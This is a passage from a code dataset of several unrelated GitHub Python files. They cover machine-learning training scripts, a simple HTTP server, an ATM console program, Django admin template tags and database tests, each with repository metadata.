var_list[7])\n layer = conv3d(layer, var_list[8])\n # encoder-s2\n layer = resnet_block(layer, var_list[9])\n layer = resnet_block(layer, var_list[10])\n skip_layers.append(layer)\n layer = downsample_maxpool(layer, var_list[11])\n layer = conv3d(layer, var_list[12])\n # deep-layers-s3\n layer = resnet_block(layer, var_list[13])\n layer = resnet_block(layer, var_list[14])\n layer = resnet_block(layer, var_list[15])\n # decoder-s2\n layer = deconv3d(layer, var_list[16], skip_layers[2].shape) + skip_layers[2]\n layer = resnet_block(layer, var_list[17])\n layer = resnet_block(layer, var_list[18])\n # decoder-s1\n layer = deconv3d(layer, var_list[19], skip_layers[1].shape) + skip_layers[1]\n layer = resnet_block(layer, var_list[20])\n layer = resnet_block(layer, var_list[21])\n # decoder-s0\n layer = deconv3d(layer, var_list[22], skip_layers[0].shape) + skip_layers[0]\n layer = resnet_block(layer, var_list[23])\n layer = resnet_block(layer, var_list[24])\n # output-layer\n layer = tf.sigmoid(conv3d(layer, var_list[25], activation=False))\n return layer\n\n\ndef loss_crossentropy(pred, target):\n return tf.losses.BinaryCrossentropy(pred=pred, target=target)\n\ndef loss_dice(pred, target, eps=1e-6):\n dice_numerator = 2 * tf.reduce_sum(pred*target, axis=[1,2,3,4])\n dice_denominator = eps + tf.reduce_sum(pred, axis=[1,2,3,4]) + tf.reduce_sum(target, axis=[1,2,3,4])\n return 1 - tf.reduce_mean(dice_numerator/dice_denominator)\n\n\n### a simple npy image reading class\nclass DataReader:\n def __init__(self, folder_name):\n self.folder_name = folder_name\n def load_images_train(self, indices_mb):\n return self.load_npy_files([\"image_train%02d.npy\" % idx for idx in indices_mb])\n def load_images_test(self, indices_mb):\n return self.load_npy_files([\"image_test%02d.npy\" % idx for idx in indices_mb])\n def load_labels_train(self, indices_mb):\n return self.load_npy_files([\"label_train%02d.npy\" % idx for idx in indices_mb])\n def load_npy_files(self, file_names):\n images = [np.float32(np.load(os.path.join(self.folder_name, fn))) for fn in file_names]\n return np.expand_dims(np.stack(images, axis=0), axis=4)\n\n\n### training\n@tf.function\ndef train_step(model, weights, optimizer, x, y):\n with tf.GradientTape() as tape:\n # g_tape.watched(var_list): trainable variables are automatically \"watched\".\n loss = loss_dice(model(x), y)\n gradients = tape.gradient(loss, weights)\n optimizer.apply_gradients(zip(gradients, weights))\n return loss\nlearning_rate = 1e-5\ntotal_iter = int(1e6)\nn = 50 # 50 training image-label pairs\nsize_minibatch = 4\n\nnum_minibatch = int(n/size_minibatch) # how many minibatches in each epoch\nindices_train = [i for i in range(n)]\n\nDataFeeder = DataReader(DATA_PATH)\noptimizer = tf.optimizers.Adam(learning_rate)\nfor step in range(total_iter):\n\n # shuffle data every time start a new set of minibatches\n if step in range(0, total_iter, num_minibatch):\n random.shuffle(indices_train)\n\n # find out data indices for a minibatch\n minibatch_idx = step % num_minibatch # minibatch index\n indices_mb = indices_train[minibatch_idx*size_minibatch:(minibatch_idx+1)*size_minibatch]\n # halve image size so this can be reasonably tested, e.g. on a CPU\n input_mb = DataFeeder.load_images_train(indices_mb)[:, ::2, ::2, ::2, :]\n label_mb = DataFeeder.load_labels_train(indices_mb)[:, ::2, ::2, ::2, :]\n # update the variables\n loss_train = train_step(residual_unet, var_list, optimizer, input_mb, label_mb)\n\n # print training information\n if (step % 100) == 0:\n tf.print('Step', step, ': training-loss=', loss_train)\n\n # --- simple tests during training ---\n if (step % 1000) == 0:\n indices_test = [random.randrange(30) for i in range(size_minibatch)] # select size_minibatch test data\n input_test = DataFeeder.load_images_test(indices_test)[:, ::2, ::2, ::2, :]\n pred_test = residual_unet(input_test)\n # save the segmentation\n for idx in range(size_minibatch):\n np.save(os.path.join(RESULT_PATH, \"label_test%02d_step%06d.npy\" % (indices_test[idx], step)), pred_test[idx, ...])\n tf.print('Test results saved.')\n","repo_name":"kkl116/MedICSS-2020","sub_path":"segmentation/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"1200960182","text":"import torch\nimport torch.nn as nn\n\nclass IntrinsicCuriosity(nn.Module):\n def __init__(self,action_dim,state_dim,feature_dim):\n super(IntrinsicCuriosity,self).__init__()\n\n\n self.feature_model = nn.Sequential(\n nn.Linear(state_dim,feature_dim),\n )\n\n self.forward_model = nn.Sequential(\n nn.Linear(feature_dim+action_dim,feature_dim)\n )\n\n self.inverse_model = nn.Sequential(\n nn.Linear(feature_dim,action_dim),\n )\n \n def forward(self,state,next_state,action):\n state_ft = self.feature_model(state)\n next_state_ft = self.feature_model(next_state)\n \n inv_inp = torch.cat((state_ft,next_state_ft),1)\n for_inp = torch.cat((state_ft,action),1)\n\n inv_op = self.inverse_model(inv_inp)\n for_op = self.forward_model(for_inp)\n\n return inv_op,for_op\n\n\nicm = IntrinsicCuriosity()\nstate = torch.rand(75)\nnext_state = torch.rand(75)\n","repo_name":"Manjunatha-b/FirstPersonShooterAI","sub_path":"MLFiles/curiosity.py","file_name":"curiosity.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73522050770","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\n\nhostName = \"\"\nserverPort = 8080\n\nclass MyServer(BaseHTTPRequestHandler):\n\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n html = '''\n \n \n

Welcome to my Raspberry Pi

\n \n \n '''\n self.wfile.write(html.encode(\"utf-8\"))\n\n### Main ###\n\nif __name__ == \"__main__\":\n webServer = HTTPServer((hostName, serverPort), MyServer)\n print(\"Server started http://%s:%s\" % (hostName, serverPort))\n\n try:\n webServer.serve_forever()\n except KeyboardInterrupt:\n pass\n\n webServer.server_close()\n print(\"Server stopped.\")\n","repo_name":"dschier-wtd/presentations","sub_path":"20220801-slub-smart-devices-2/examples/web_1.py","file_name":"web_1.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"38758950076","text":"#!/usr/bin/env python3\n\nimport pygame\nfrom pygame.locals import DOUBLEBUF\n\nclass Display(object):\n def __init__(self, W, H):\n pygame.init()\n self.screen = pygame.display.set_mode((W, H), DOUBLEBUF)\n self.surface = pygame.Surface(self.screen.get_size()).convert()\n print(self.surface)\n\n def paint(self, img):\n pygame.surfarray.blit_array(self.surface, img.swapaxes(0,1)[:, :, [2,1,0]]) # BGR > RGB\n self.screen.blit(self.surface, (0,0))\n pygame.display.flip()","repo_name":"epochlab/SfM","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"570085379","text":"from nltk.tree import *\n\nclass Permutator:\n results = set() \n nps = []\n maxResults = 0\n def __init__(self, source, limit) -> None:\n self.tree = ParentedTree.fromstring(source)\n self.maxResults = limit\n\n #Collect array of arrays with all children NPs and their parent just in case for future\n def traverse(self, root):\n if len(root) == 0:\n return\n level = []\n for node in root:\n if type(node) == ParentedTree:\n if node.label() == \"NP\":\n level.append(node.treeposition()) \n self.traverse(node)\n if len(level) > 1:\n self.nps.append(level)\n\n #Helper function to swap two nodes on a tree\n def swap_nodes(self, node1, node2):\n #Have to use temp trees to avoid \"Can not insert a subtree that already has a parent.\" value error\n temp1 = self.tree[node1].copy(deep=True)\n temp2 = self.tree[node2].copy(deep=True)\n self.tree[node1] = temp2\n self.tree[node2] = temp1\n\n #Recursive backtracking algorithm to find permutations in a group of NPs \n def permutateNPs(self, group, start, end, subgroup=None):\n if len(self.results) >= self.limit:\n return\n if start == end:\n if subgroup:\n self.permutateNPs(subgroup, 0, len(subgroup))\n \n self.results.add(self.tree._pformat_flat(\"\", \"()\", False))\n else:\n for i in range(start, end):\n first = group[i]\n second = group[start]\n if first != second:\n self.swap_nodes(first, second)\n first, second = second, first \n self.permutateNPs(group, start+1, end, subgroup=subgroup)\n if first != second:\n self.swap_nodes(first, second)\n first, second = second, first\n \n #Return a set of all possible permutations of separate permutations\n def permutate_tree(self):\n self.traverse(self.tree)\n for i,group in enumerate(self.nps):\n for j in range(i+1,len(self.nps)):\n group2 = self.nps[j]\n self.permutateNPs(group, 0, len(group), subgroup=group2)\n \n def seralize_permutations(self):\n return([{\"tree\": x} for x in self.results])\n","repo_name":"Dagonite6/SyntaxTreePermutations","sub_path":"permutator.py","file_name":"permutator.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73327708691","text":"import math\n\n\n#--SPLIT--\n# -class Solution:\n# @param A : tuple of integers\n# @return a list of integers\n# -\tdef repeatedNumber(self, A):\n\n\n#--SPLIT--\nclass Solution:\n\t# @param A : tuple of integers\n\t# @return a list of integers\n\tdef repeatedNumber(self, A):\n\t\treturn A\n\n\n#--SPLIT--\n\nif __name__ == \"__main__\":\n\ttest_cases = int(raw_input())\n\tfor i in range(test_cases):\n\t\tA = [int(l) for l in raw_input().split(\" \")][1:]\n\t\tsolution = Solution()\n\t\tresult = solution.repeatedNumber(A)\n\t\tprint(\"{0} {1} \".format(result[0], result[1]))\n","repo_name":"hacktheinterview/hacktheinterview","sub_path":"problems/97/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34453909111","text":"import random\r\nimport sys\r\n\r\nclass ATM():\r\n def __init__(self, nama, nomor_akun, saldo = 0):\r\n self.nama = nama\r\n self.nomor_akun = nomor_akun\r\n self.saldo = saldo\r\n\r\n def detail_akun (self):\r\n print(\"\\n----------DETAIL AKUN----------\")\r\n print(f\"Pemilik Akun : {self.nama}\")\r\n print(f\"Nomor Akun : {self.nomor_akun}\")\r\n print(f\"Saldo yang Tersedia : Rp.{self.saldo}\\n\")\r\n\r\n def setor(self, jumlah):\r\n self.jumlah = jumlah\r\n self.saldo = self.saldo + self.jumlah\r\n print(\"Saldo rekening saat ini: Rp.\", self.saldo)\r\n print()\r\n \r\n def menarik(self, jumlah):\r\n self.jumlah = jumlah\r\n if self.jumlah > self.saldo:\r\n print(\"Saldo Anda tidak Cukup!\")\r\n print(f\"Saldo Anda hanya Rp.{self.saldo}\")\r\n print(\"Coba dengan jumlah yang lebih rendah dari saldo.\")\r\n print()\r\n else :\r\n self.saldo = self.saldo - self.jumlah\r\n print(f\"Rp.{jumlah} Penarikan Berhasil!\")\r\n print(\"Saldo rekening saat ini: Rp.\", self.saldo)\r\n print()\r\n \r\n def check_saldo(self):\r\n print(\"Saldo yang Tersedia : Rp.\", self.saldo)\r\n print()\r\n\r\n def transaksi(self):\r\n print(\"\"\"\r\n TRANSAKSI\r\n *********************\r\n Menu:\r\n 1. Detail Akun \r\n 2. Check Saldo\r\n 3. Setor\r\n 4. Menarik\r\n 5. Exit\r\n *********************\r\n \"\"\")\r\n\r\n while True:\r\n try:\r\n pilih = int(input(\"Maukkan angka 1, 2, 3, 4 atau 5: \"))\r\n except:\r\n print(\"Error: Masukkan angka 1, 2, 3, 4, atau 5 saja!\\n\")\r\n continue\r\n else:\r\n if pilih == 1:\r\n atm.detail_akun()\r\n elif pilih == 2:\r\n atm.check_saldo()\r\n elif pilih == 3:\r\n jumlah = int(input(\"Berapa banyak yang ingin Anda Setrorkan(Rp.): \"))\r\n atm.setor(jumlah)\r\n elif pilih == 4:\r\n jumlah = int(input(\"Berapa banyak yang ingin Anda tarik (Rp.): \"))\r\n atm.menarik(jumlah)\r\n elif pilih == 5:\r\n print(f\"\"\"\r\n Tanda Penerima..............\r\n ****************************************\r\n Transaksi Selesai. \r\n Nomor Transaksi: {random.randint(10000, 1000000)} \r\n Pemilik Akun : {self.nama} \r\n Nomor Akun : {self.nomor_akun} \r\n Saldo yang Tersedia: Rp.{self.saldo} \r\n \r\n Terima kasih telah memilih kami sebagai bank Anda \r\n *********************************************************\r\n \"\"\")\r\n sys.exit()\r\n \r\n \r\nprint(\"*******SELAMAT DATANG DI BANK INDONESIA*******\")\r\nprint(\"___________________________________________________________\\n\")\r\nprint(\"----------------PEMBUATAN AKUN---------------\")\r\nnama = input(\"Masukkan nama Anda : \")\r\nnomor_akun = input(\"Masukkan nomor akun Anda : \")\r\nprint(\"Selamat! Akun Anda berhasil dibuat......\\n\")\r\n \r\natm = ATM(nama, nomor_akun)\r\n \r\nwhile True:\r\n trans = input(\"Apakah anda ingin melakukan Transaksi?(y/n): \")\r\n if trans == \"y\":\r\n atm.transaksi()\r\n elif trans == \"n\":\r\n print(\"\"\"\r\n ----------------------------------------------------\r\n | Terima kasih telah memilih kami sebagai bank Anda |\r\n | Kunjungi kami lagi! |\r\n ----------------------------------------------------\r\n \"\"\")\r\n break\r\n else:\r\n print(\"Perintah yang Anda masukkan salah! Masukkan 'y' untuk Ya dan 'n' untuk Tidak.\\n\")\r\n","repo_name":"Fitriani-26/OOP","sub_path":"ATM (FITRIANI).py","file_name":"ATM (FITRIANI).py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43245706049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport numpy as np\nfrom scipy import stats\n\nimport unittest\n\nfrom tests.distributions import utils\n\nimport oneflow.experimental as flow\nfrom zhusuan_of.distributions.normal import *\n\nflow.enable_eager_execution()\n\n# TODO: test sample value\nclass TestNormal(unittest.TestCase):\n def setUp(self): \n self._Normal_std = lambda mean, std, **kwargs: Normal(\n mean=mean, std=std, **kwargs)\n self._Normal_logstd = lambda mean, logstd, **kwargs: Normal(\n mean=mean, logstd=logstd, **kwargs)\n\n def test_init(self):\n try:\n Normal(mean=flow.ones((2, 1)),\n std=flow.zeros((2, 4, 3)), logstd=flow.zeros((2, 2, 3)))\n except:\n raise ValueError(\"Either.*should be passed\")\n\n try:\n Normal(mean=flow.ones((2, 1)), logstd=flow.zeros((2, 4, 3)))\n except:\n raise ValueError(\"should be broadcastable to match\")\n\n try:\n Normal(mean=flow.ones((2, 1)), std=flow.ones((2, 4, 3)))\n except:\n raise ValueError(\"should be broadcastable to match\")\n Normal(mean=flow.ones((32, 1), dtype=flow.float32),\n logstd=flow.ones((32, 1, 3), dtype=flow.float32))\n Normal(mean=flow.ones((32, 1), dtype=flow.float32),\n std=flow.ones((32, 1, 3), dtype=flow.float32) )\n\n def test_sample_shape(self):\n utils.test_2parameter_sample_shape_same(\n self, self._Normal_std, np.zeros, np.ones)\n utils.test_2parameter_sample_shape_same(\n self, self._Normal_logstd, np.zeros, np.zeros)\n\n def test_sample_reparameterized(self):\n mean = flow.ones((2, 3), requires_grad=True)\n logstd = flow.ones((2, 3), requires_grad=True)\n norm_rep = Normal(mean=mean, logstd=logstd)\n samples = norm_rep.sample()\n mean_grads, logstd_grads = flow.autograd.grad(\n outputs=[samples], inputs=[mean, logstd], out_grads=[flow.ones_like(samples)])\n\n self.assertTrue(mean_grads is not None)\n self.assertTrue(logstd_grads is not None)\n\n def test_log_prob_shape(self):\n utils.test_2parameter_log_prob_shape_same(\n self, self._Normal_std, np.zeros, np.ones, np.zeros)\n utils.test_2parameter_log_prob_shape_same(\n self, self._Normal_logstd, np.zeros, np.zeros, np.zeros)\n \n\n def test_value(self):\n def _test_value(given, mean, logstd):\n mean = np.array(mean, np.float32)\n given = np.array(given, np.float32)\n logstd = np.array(logstd, np.float32)\n std = np.exp(logstd)\n target_log_p = np.array(stats.norm.logpdf(given, mean, np.exp(logstd)), np.float32)\n\n mean = flow.Tensor(mean)\n logstd = flow.Tensor(logstd)\n std = flow.Tensor(std)\n given = flow.Tensor(given)\n norm1 = Normal(mean=mean, logstd=logstd)\n log_p1 = norm1.log_prob(given)\n np.testing.assert_allclose(log_p1.numpy(), target_log_p, rtol= 1e-03)\n\n norm2 = Normal(mean=mean, std=std)\n log_p2 = norm2.log_prob(given)\n np.testing.assert_allclose(log_p2.numpy(), target_log_p, rtol= 1e-03)\n\n _test_value([0.], [0.], [0.])\n _test_value([0.99, 0.9, 9., 99.], [1.], [-3., -1., 1., 10.])\n _test_value([7.], [0., 4.], [[1., 2.], [3., 5.]])\n\n def test_distribution_shape(self):\n param1 = flow.zeros((1))\n param2 = flow.ones((1))\n distribution = self._Normal_logstd(param1, param2)\n utils.test_and_save_distribution_img(distribution)","repo_name":"Oneflow-Inc/Zhusuan-Oneflow","sub_path":"tests/distributions/test_normal.py","file_name":"test_normal.py","file_ext":"py","file_size_in_byte":3758,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"28811846481","text":"from argparse import ArgumentParser\n\nimport sys\n\nimport logging\n\nfrom processors.news_extraction_processor import NewsExtractionProcessor\nfrom utils.options import Options\nfrom data.news_sources import source\n\nlogging.basicConfig(\n level=logging.INFO,\n stream=sys.stdout,\n format='[%(asctime)s]: %(name)s : %(levelname)s : %(message)s'\n)\nlog = logging.getLogger(__name__)\n\n\ndef main(argv):\n options = parse_args(argv)\n log.info(\"options: \" + str(options))\n\n processor = NewsExtractionProcessor(options)\n processor.process()\n\n\ndef parse_args(argv):\n parser = ArgumentParser(prog=\"news-extraction\")\n parser.add_argument('--news_source', metavar='News source',\n type=source, required=True)\n parser.add_argument('--stock_news_path', metavar='Stock News Path',\n type=str, required=True)\n parser.add_argument('--output_file', metavar='Output File',\n type=str, required=True)\n\n return parser.parse_args(argv, namespace=Options())\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"vineetjohn/stock-news-corpora-analysis","sub_path":"stock_news_extractor.py","file_name":"stock_news_extractor.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17123939047","text":"from mxnet import gluon, init,autograd\nfrom mxnet.gluon import loss as gloss, nn ,data as gdata\n\n\n# 【生成数据】\n\ntrain_data = gdata.vision.FashionMNIST(train=True)\ntest_data = gdata.vision.FashionMNIST(train=False)\n\n# 【读取数据】\n\nbatch_size = 256\n\ntransformer = gdata.vision.transforms.ToTensor()\ntrain_iter = gdata.DataLoader(train_data.transform_first(transformer), batch_size, shuffle=True)\ntest_iter =gdata.DataLoader(test_data.transform_first(transformer), batch_size ,shuffle=False)\n\n# 【定义模型】\n\nnet = nn.Sequential()\nnet.add(nn.Dense(256, activation='relu'),nn.Dense(10))\n\n# 【初始化模型参数】\n\nnet.initialize(init.Normal(sigma=0.01))\n\n# 【定义损失函数】\n\nloss =gloss.SoftmaxCrossEntropyLoss()\n\n# 【定义优化算法】\ntrainer = gluon.Trainer(net.collect_params(), 'sgd', {'learning_rate':0.5})\n\n# 【训练模型】\n\nnum_epochs = 20\n\n# 定义归一化处理和计算准确率\ndef normal(y_hat, y):\n return (y_hat.argmax(axis=1) == y.astype('float32')).mean().asscalar()\n\ndef accuracy(data_iter,net):\n acc = 0\n for X, y in data_iter:\n acc += normal(net(X), y)\n return acc / len(data_iter)\n\nfor epoch in range(num_epochs):\n loss_sum = 0\n train_acc_sum = 0\n for X ,y in train_iter:\n with autograd.record():\n y_hat = net(X)\n l = loss(y_hat, y)\n l.backward()\n trainer.step(batch_size)\n loss_sum += l.mean().asscalar()\n train_acc_sum += normal(y_hat, y)\n test_acc = accuracy(test_iter, net)\n print('epoch %d loss %.3f train_loss %.3f test_acc %.3f' % (epoch,\n loss_sum/len(train_iter),\n train_acc_sum/len(train_iter),\n test_acc))\n\n\n","repo_name":"starship2018/deeplearning_mxnet","sub_path":"3-6-GluonToMultilayerPerceptron.py","file_name":"3-6-GluonToMultilayerPerceptron.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"25716264492","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 11 11:00:27 2020\n\n@author: fiona\n\"\"\"\n\n# PBC 109-1 TA Lab 7 \n\n# Practice 1\n\"\"\"\n请定义一个函数 countCharacter(str_),接收一个字串参数。\n找出字串中重复出现最多次的字元,并印出其出现次数及其字元。\n重复出现最多次的字元只会有一个。\n若没有重复出现的字元,则印出 N。\n\"\"\"\ndef countCharacter(str_):\n char_list = []\n for char in str_: # 将字元加入一个list\n if char_list.count(char) == 0: # 没出现过才加\n char_list.append(char)\n \n # 记录最多次\n max_count = 0\n max_character = \"\"\n for character in char_list: # 找出现最多次的字元\n if str_.count(character) > max_count:\n max_count = str_.count(character)\n max_character = character\n if max_count == 1: # 最多次数是1即是没有重复\n print(\"N\")\n else:\n print(max_count, max_character, sep=\",\")\n\nprint(\"-Practice 1-\") \ncountCharacter(input(\"输入一字串,将会找出重复出现最多次的字元:\"))\n\n\n# Practice 2\n\"\"\"\n所谓凯萨密码,就是将原本的文字母对应到偏移过后的英文字母。\n举例而言,若偏移量为 3,则 A->D,B->E,X则对应回到 A。\n请定义一个函数caesar(str_, n),输入为一字串以及偏移量,输出为加密过后的字串。\nHint: ord() 和 chr()\n\"\"\"\ndef caesar(str_, n):\n result = \"\"\n for i in range(len(str_)):\n char = str_[i]\n if char.isupper():\n shift = (ord(char) + n - ord('A')) % 26 + ord('A')\n result += chr(shift)\n else:\n shift = (ord(char) + n - ord('a')) % 26 + ord('a')\n result += chr(shift)\n return result\n\nprint()\nprint(\"-Practice 2-\")\nprint(\"输入一字串以及偏移量,输出为加密过后的字串。\")\nstr_ = input(\"输入一字串(英文字母):\")\nn = int(input(\"输入偏移量(正整数):\"))\nprint(caesar(str_, n))\n\n\n# Practice 3\n\"\"\"\n定义一个函数 myPalindrome,接收一个字串参数。\n用递回的方式检查此字串是否为对称。\n效果等于 s == s[::-1]。\n\"\"\"\ndef myPalindrome(string):\n if len(string) <= 1:\n return True\n else:\n if string[0] == string[-1]:\n return myPalindrome(string[1:-1])\n else:\n return False\n\nprint()\nprint(\"-Practice 3-\")\nprint(myPalindrome(input(\"输入一字串,将会判断是否为对称:\")))","repo_name":"fifionaLin/Python_Exercise","sub_path":"Lab7_Practice.py","file_name":"Lab7_Practice.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27456799406","text":"from django import template\nfrom django.utils.safestring import mark_safe\nfrom django.utils.timezone import datetime, timedelta\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef get_model_verbose_name(model_obj):\n model_name = model_obj._meta.verbose_name if model_obj._meta.verbose_name else model_obj._meta.verbose_name_plural\n\n if not model_name:\n model_name = model_obj._meta.model_name\n\n print(\"model obj\", model_obj)\n return model_name.capitalize()\n\n\n@register.simple_tag\ndef get_model_name(model_obj):\n return model_obj._meta.model_name\n\n\n@register.simple_tag\ndef get_app_name(model_obj):\n return model_obj._meta.app_label\n\n\n@register.simple_tag\ndef build_table_row(admin_obj, obj):\n row_ele = \"\"\n\n for column in admin_obj.list_display:\n column_obj = obj._meta.get_field(column)\n if column_obj.choices:\n get_column_data = getattr(obj, \"get_%s_display\" % column)\n column_data = get_column_data()\n else:\n column_data = getattr(obj, column)\n if type(column_data).__name__ == 'datetime':\n column_data = column_data.strftime('%Y-%m-%d %H:%M:%S')\n\n td_ele = '''%s''' % column_data\n row_ele += td_ele\n\n return mark_safe(row_ele)\n\n\n@register.simple_tag\ndef get_filter_field(filter_column, admin_obj):\n # print(\"admin obj\",admin_obj.model ,filter_column)\n # 获取数据库中的字段对象,用来获取choices\n field_obj = admin_obj.model._meta.get_field(filter_column)\n select_ele = \"\"\"'\n return mark_safe(select_ele)\n\n\n@register.simple_tag\ndef get_orderby_key(request, colomn):\n order_key = request.GET.get('o')\n if order_key == colomn: # 当前列有排序\n if order_key.startswith('-'):\n return order_key.strip('-')\n else:\n return '-%s' % colomn\n return colomn\n\n\n@register.simple_tag\ndef generate_filter_url(request, admin_obj):\n q = request.GET.get('q')\n url = ''\n if admin_obj.filter_conditions:\n for k, v in admin_obj.filter_conditions.items():\n url += \"%s=%s\" % (k, v)\n if q:\n url += \"&q=%s\" % q\n return url\n\n\n@register.simple_tag\ndef display_order_by_icon(request, column):\n order_field = request.GET.get('o')\n if order_field: # 查找到被排序的列\n if order_field.strip('-') == column: # 当前列被排序\n # print('当前列被排序列:', column)\n if order_field.startswith('-'):\n icon = 'bottom'\n else:\n icon = 'top'\n ele = \"\"\"\"\"\" % icon\n\n return mark_safe(ele)\n return ''\n\n\n@register.filter\ndef get_search_field(request):\n '''\n return the field value of 'q' to frontier\n :param request:\n :return:\n '''\n field = request.GET.get('q')\n return field\n\n\n@register.simple_tag\ndef generate_paginator(request, page_info, admin_obj):\n '''\n 生成分页器显示\n '''\n q = request.GET.get('q', '')\n o = request.GET.get('o', '')\n condition = ''\n if admin_obj.filter_conditions:\n for k, v in admin_obj.filter_conditions.items():\n condition += \"%s=%s&\" % (k, v)\n condition += 'q=%s&' % q\n condition += 'o=%s&' % o\n\n length = page_info['length'] # int\n last = page_info['last'] # int #最后一个页面\n current = page_info['current'] # int 当前页面\n num_container = int(last / length) # 要用给多少容器\n position = int(current / length) # 第几个容器\n if last % length: # 最后一排有余数\n num_container += 1\n if current % length: # 要多拿一个容器\n position += 1\n start = (position - 1) * length + 1\n if last: # 有数据\n ele = ''\n # 有上一排\n if position > 1:\n ele += '''
  • \n «
  • ''' % (condition, start - 1)\n # 写数据\n range_flag = start + length\n if start + 5 > last:\n range_flag = last + 1 # 要取到最后一个\n tmp = start\n while tmp < range_flag:\n if current == tmp:\n ele += '''
  • %s
  • ''' % (condition, tmp, tmp)\n else:\n ele += '''
  • %s
  • ''' % (condition, tmp, tmp)\n tmp += 1\n if position < num_container:\n ele += '''
  • \n »
  • ''' % (condition, start + 5)\n\n return mark_safe(ele)\n return ''\n","repo_name":"if000else/PerfectCRM","sub_path":"kingadmin/templatetags/kingadmin_tags.py","file_name":"kingadmin_tags.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40687244296","text":"print(\"\\n**** CALCULADORA DE CALORIAS DIÁRIAS ****\")\r\nquantidade_alimento = int(input(\"\\nDigite a quantidade de alimentos ingeridos no seu dia: \"))\r\nsoma = 0\r\n\r\nfor x in range(1, quantidade_alimento+1):\r\n calorias_alimentos = float(input(\"Informe a quantidade de calorias do alimento {}: \".format(x)))\r\n soma = soma + calorias_alimentos\r\nprint(\"\\n O TOTAL DE CALORIAS INGERIDAS É DE: {} Kcal\".format(soma))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"GustavoPetry/Solving-Python","sub_path":"004 - Calculadora de Calorias.py","file_name":"004 - Calculadora de Calorias.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6475713929","text":"from os import path\nfrom pathlib import Path\nfrom unittest.mock import Mock\n\nimport pytest\nfrom alembic.config import Config\nfrom alembic.migration import MigrationContext\nfrom alembic.script import ScriptDirectory\nfrom sqlalchemy import select\n\nfrom covalent_dispatcher._db import models\nfrom covalent_dispatcher._db.datastore import DataStore\n\nfrom .fixtures import workflow_fixture\n\n\n@pytest.fixture\ndef db():\n \"\"\"Instantiate and return an in-memory database.\"\"\"\n\n return DataStore(\n db_URL=\"sqlite+pysqlite:///:memory:\",\n initialize_db=True,\n )\n\n\ndef test_db_path(db: DataStore, tmp_path: Path):\n db_dir_path = tmp_path / \"db_dir\"\n db_dir_path.mkdir()\n db_path = db_dir_path / \"my_db.sqlite\"\n\n db_url = f\"sqlite+pysqlite:///{str(db_path.resolve())}\"\n\n db = DataStore(db_URL=db_url, initialize_db=True)\n assert db.db_URL == db_url\n\n\ndef test_default_db_path(db: DataStore, tmp_path: Path, mocker):\n DB_PATH = \"/tmp/my_db.sqlite\"\n\n mocker.patch(\"sqlalchemy.create_engine\")\n mocker.patch(\"sqlalchemy.orm.sessionmaker\")\n mocker.patch(\"covalent_dispatcher._db.datastore.get_config\", return_value=DB_PATH)\n\n db_url = f\"sqlite+pysqlite:///{DB_PATH}\"\n\n assert DataStore().db_URL == db_url\n\n\ndef test_run_migrations(db: DataStore, mocker):\n config_mock = Mock()\n command_mock = mocker.patch(\"covalent_dispatcher._db.datastore.command\")\n\n def get_config_mock(logging_enabled):\n return config_mock\n\n mocker.patch.object(db, \"get_alembic_config\", get_config_mock)\n\n db.run_migrations()\n command_mock.upgrade.assert_called_once_with(config_mock, \"head\")\n\n\ndef test_current_head(db: DataStore, mocker):\n MOCK_REVISION = \"8a15\"\n script_mock = Mock()\n mocker.patch.object(ScriptDirectory, \"from_config\", lambda config: script_mock)\n script_mock.get_current_head.return_value = MOCK_REVISION\n assert db.current_head() == MOCK_REVISION\n\n\ndef test_current_revision(db: DataStore, mocker):\n MOCK_REVISION = \"8a15\"\n script_mock = Mock()\n migration_ctx_mock = Mock()\n mocker.patch(\"covalent_dispatcher._db.datastore.EnvironmentContext\")\n mocker.patch.object(db, \"engine\", Mock())\n mocker.patch.object(ScriptDirectory, \"from_config\", lambda config: script_mock)\n mocker.patch.object(\n MigrationContext, \"configure\", lambda config, environment_context=None: migration_ctx_mock\n )\n\n migration_ctx_mock.get_current_revision.return_value = MOCK_REVISION\n\n assert db.current_revision() == MOCK_REVISION\n\n\ndef test_get_alembic_config(db: DataStore, mocker):\n config_mock = 